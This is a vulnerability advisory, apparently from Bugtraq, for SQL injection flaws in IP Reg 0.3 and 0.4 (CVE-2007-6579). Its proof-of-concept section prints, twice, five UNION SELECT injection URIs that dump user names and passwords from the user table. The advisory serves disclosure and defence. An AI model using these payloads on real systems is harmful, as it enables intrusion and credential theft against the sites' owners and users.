IP Reg Multiple SQL Injection Vulnerabilities
BID:26993
Info
IP Reg Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26993 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6579 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 22 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | MhZ91 is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
IP Reg IP Reg 0.4 IP Reg IP Reg 0.3 |
| Not Vulnerable: | |
Discussion
IP Reg Multiple SQL Injection Vulnerabilities
IP Reg is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect IP Reg 0.3 and 0.4; other versions may also be affected.
IP Reg is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
These issues affect IP Reg 0.3 and 0.4; other versions may also be affected.
Exploit / POC
IP Reg Multiple SQL Injection Vulnerabilities
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com//vlanview.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//vlanedit.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//vlandel.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//assetclassgroupview.php?assetclassgroup_id='+union+select+1,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//nodelist.php?subnet_id='+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
Attackers may exploit these issues through a browser.
The following proof-of-concept URIs are available:
http://www.example.com//vlanview.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//vlanedit.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//vlandel.php?vlan_id='+union+select+1,2,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//assetclassgroupview.php?assetclassgroup_id='+union+select+1,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
http://www.example.com//nodelist.php?subnet_id='+union+select+1,2,3,4,5,6,7,concat(user_name,char(58),user_pass,char(58),user_displayname)+from+user+where+user_id=[UserID]/*
Solution / Fix
IP Reg Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].